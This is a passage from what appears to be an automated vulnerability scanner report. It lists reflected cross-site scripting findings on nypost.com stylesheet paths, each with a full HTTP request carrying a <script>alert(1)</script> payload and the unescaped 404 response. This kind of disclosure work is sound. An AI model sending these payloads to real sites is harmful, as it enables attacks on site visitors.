Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig6cc6e<script>alert(1)</script>ae37078603d/WebPortal/nypost/blocks/hat/hat.css</p>
...[SNIP]...

1.222. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4965a<script>alert(1)</script>4ae16c0be26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal4965a<script>alert(1)</script>4ae16c0be26/nypost/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal4965a<script>alert(1)</script>4ae16c0be26/nypost/blocks/hat/hat.css</p>
...[SNIP]...

1.223. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31704<script>alert(1)</script>d39de5160d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost31704<script>alert(1)</script>d39de5160d8/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:04 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost31704<script>alert(1)</script>d39de5160d8/blocks/hat/hat.css</p>
...[SNIP]...

1.224. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bd485<script>alert(1)</script>193890173be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksbd485<script>alert(1)</script>193890173be/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksbd485<script>alert(1)</script>193890173be/hat/hat.css</p>
...[SNIP]...

1.225. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c6a7<script>alert(1)</script>545a2c5be11 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hat8c6a7<script>alert(1)</script>545a2c5be11/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hat8c6a7<script>alert(1)</script>545a2c5be11/hat.css</p>
...[SNIP]...

1.226. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 65850<script>alert(1)</script>b4a82bde358 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css65850<script>alert(1)</script>b4a82bde358 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css65850<script>alert(1)</script>b4a82bde358</p>
...[SNIP]...

1.227. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e0bb<script>alert(1)</script>341c7e99cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig4e0bb<script>alert(1)</script>341c7e99cf/WebPortal/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig4e0bb<script>alert(1)</script>341c7e99cf/WebPortal/nypost/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.228. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 208e3<script>alert(1)</script>315a306eca7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal208e3<script>alert(1)</script>315a306eca7/nypost/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:12 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal208e3<script>alert(1)</script>315a306eca7/nypost/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.229. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97698<script>alert(1)</script>52bff809a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost97698<script>alert(1)</script>52bff809a2/blocks/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:15 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost97698<script>alert(1)</script>52bff809a2/blocks/hot_topics/hot_topics.css</p>
...[SNIP]...

1.230. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1ba05<script>alert(1)</script>1ec9bb3b14c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1ba05<script>alert(1)</script>1ec9bb3b14c/hot_topics/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:17 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1ba05<script>alert(1)</script>1ec9bb3b14c/hot_topics/hot_topics.css</p>
...[SNIP]...

1.231. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4dc7a<script>alert(1)</script>f0b6cfcc4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics4dc7a<script>alert(1)</script>f0b6cfcc4/hot_topics.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics4dc7a<script>alert(1)</script>f0b6cfcc4/hot_topics.css</p>
...[SNIP]...

1.232. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a7a6c<script>alert(1)</script>4dabacaeab7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.cssa7a6c<script>alert(1)</script>4dabacaeab7 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics.cssa7a6c<script>alert(1)</script>4dabacaeab7</p>
...[SNIP]...

1.233. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5c5f<script>alert(1)</script>f09d03ad0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigc5c5f<script>alert(1)</script>f09d03ad0c/WebPortal/nypost/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigc5c5f<script>alert(1)</script>f09d03ad0c/WebPortal/nypost/blocks/markets/markets.css</p>
...[SNIP]...

1.234. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 879fd<script>alert(1)</script>3721b0ad5ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal879fd<script>alert(1)</script>3721b0ad5ba/nypost/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal879fd<script>alert(1)</script>3721b0ad5ba/nypost/blocks/markets/markets.css</p>
...[SNIP]...

1.235. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b7f5<script>alert(1)</script>15074911464 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost4b7f5<script>alert(1)</script>15074911464/blocks/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost4b7f5<script>alert(1)</script>15074911464/blocks/markets/markets.css</p>
...[SNIP]...

1.236. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1912c<script>alert(1)</script>f29ff77d1e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1912c<script>alert(1)</script>f29ff77d1e2/markets/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1912c<script>alert(1)</script>f29ff77d1e2/markets/markets.css</p>
...[SNIP]...

1.237. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9dbf8<script>alert(1)</script>5b449c7fdd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/markets9dbf8<script>alert(1)</script>5b449c7fdd/markets.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 718
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/markets9dbf8<script>alert(1)</script>5b449c7fdd/markets.css</p>
...[SNIP]...

1.238. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3a03b<script>alert(1)</script>7e857a3241b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css3a03b<script>alert(1)</script>7e857a3241b HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css3a03b<script>alert(1)</script>7e857a3241b</p>
...[SNIP]...

1.239. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b225<script>alert(1)</script>0d0497a7126 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig7b225<script>alert(1)</script>0d0497a7126/WebPortal/nypost/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
